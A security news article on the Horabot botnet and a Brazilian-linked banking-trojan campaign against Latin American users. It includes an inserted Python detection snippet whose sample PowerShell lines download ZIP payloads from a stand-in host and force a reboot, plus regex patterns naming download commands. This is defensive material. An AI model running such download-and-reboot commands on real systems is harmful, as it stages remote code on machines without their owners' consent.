New Botnet Malware 'Horabot' Targets Spanish-Speaking Users in Latin America

Jun 02, 2023 | Ravie Lakshmanan | Botnet / Malware


Spanish-speaking users in Latin America have been on the receiving end of a new botnet malware dubbed Horabot since at least November 2020.

"Horabot enables the threat actor to control the victim's Outlook mailbox, exfiltrate contacts' email addresses, and send phishing emails with malicious HTML attachments to all addresses in the victim's mailbox," Cisco Talos researcher Chetan Raghuprasad said.

The botnet program also delivers a Windows-based financial trojan and a spam tool to harvest online banking credentials as well as compromise Gmail, Outlook, and Yahoo! webmail accounts to blast out spam emails.

The cybersecurity firm said a majority of the infections are located in Mexico, with limited victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. The threat actor behind the campaign is believed to be in Brazil.

Targeted users of the ongoing campaign primarily span the accounting, construction and engineering, wholesale distribution, and investment verticals, although it is suspected that other sectors in the region may also be affected.

The attacks begin with phishing emails bearing tax-themed lures that entice the recipients into opening an HTML attachment, which, in turn, embeds a link leading to a RAR archive.

Opening the contents of the archive leads to the execution of a PowerShell downloader script that is responsible for retrieving a ZIP file containing the main payloads from a remote server and rebooting the machine.

The system restart also serves as a launchpad for the banking trojan and the spam tool, allowing the threat actor to steal data, log keystrokes, capture screenshots, and disseminate additional phishing emails to the victim's contacts.
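As an added, defender-side illustration (not code from the Cisco Talos report or from this article), the following Python flags PowerShell script blocks that show the two traits the article attributes to the downloader stage, fetching a ZIP from a remote server and forcing a reboot, over a few constructed log lines. The regexes and the sample script texts are assumptions made for the demonstration, not published Horabot indicators.

```python
import re

# Constructed sample PowerShell script-block texts, as a SIEM might flatten
# them from Windows script-block logging (one script per entry). These are
# made-up examples for this demonstration, not real Horabot script contents.
SAMPLE_SCRIPTS = [
    "Invoke-WebRequest -Uri http://example.invalid/stage.zip -OutFile $env:TEMP\\stage.zip; "
    "Expand-Archive $env:TEMP\\stage.zip -DestinationPath $env:APPDATA; Restart-Computer -Force",
    "Get-ChildItem C:\\Users\\alice\\Documents | Where-Object Length -gt 1MB",
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/p.zip', "
    "'C:\\Users\\Public\\p.zip'); shutdown /r /t 0",
    "Invoke-WebRequest -Uri https://example.invalid/report.zip -OutFile report.zip",
]

# Heuristic patterns (assumed for this example, not vendor indicators) for the
# three behaviours the article attributes to the downloader stage.
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I)
ARCHIVE = re.compile(r"\.zip\b|Expand-Archive", re.I)
REBOOT = re.compile(r"Restart-Computer|\bshutdown(?:\.exe)?\s+[/-]r\b", re.I)


def script_traits(script):
    """Return the list of traits (download, archive, reboot) a script exhibits."""
    traits = []
    if DOWNLOAD.search(script):
        traits.append("download")
    if ARCHIVE.search(script):
        traits.append("archive")
    if REBOOT.search(script):
        traits.append("reboot")
    return traits


def flag_downloader_like(scripts):
    """Flag scripts that both fetch content and force a reboot.

    Requiring both traits keeps an ordinary download-only script (such as the
    last sample) from alerting; the 'archive' trait is reported for context.
    """
    flagged = []
    for index, script in enumerate(scripts):
        traits = script_traits(script)
        if "download" in traits and "reboot" in traits:
            flagged.append({"index": index, "traits": traits})
    return flagged


if __name__ == "__main__":
    for hit in flag_downloader_like(SAMPLE_SCRIPTS):
        print(f"script {hit['index']}: {', '.join(hit['traits'])}")
```

In a real deployment the same logic would run over Windows PowerShell script-block log events rather than an inline list, and the pattern set would be tuned against the environment's legitimate update scripts.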

"This campaign involves a multi-stage attack chain that begins with a phishing email and leads to payload delivery through the execution of a PowerShell downloader script and sideloading to legitimate executables," Raghuprasad said.


The banking trojan is a 32-bit Windows DLL written in the Delphi programming language, and shares overlaps with other Brazilian malware families like Mekotio and Casbaneiro.

Horabot, for its part, is an Outlook phishing botnet program written in PowerShell that is capable of sending phishing emails to all email addresses in the victim's mailbox to propagate the infection. Sending from compromised mailboxes is also a deliberate attempt to keep the threat actor's own phishing infrastructure from being exposed.


The disclosure arrives a week after SentinelOne attributed to an unknown Brazilian threat actor a long-running campaign targeting more than 30 Portuguese financial institutions with information-stealing malware since 2021.

It also follows the discovery of a new Android banking trojan dubbed PixBankBot that abuses the operating system's accessibility services to conduct fraudulent money transfers over the Brazilian PIX payments platform.

PixBankBot is also the latest example of malware that specifically focuses on Brazilian banks, featuring capabilities similar to BrasDex, PixPirate, and GoatRAT, which have been observed in recent months.

If anything, the developments signify yet another iteration of a broader group of financially motivated hacking efforts emanating from Brazil, making it essential that users remain vigilant to avoid falling prey to such threats.
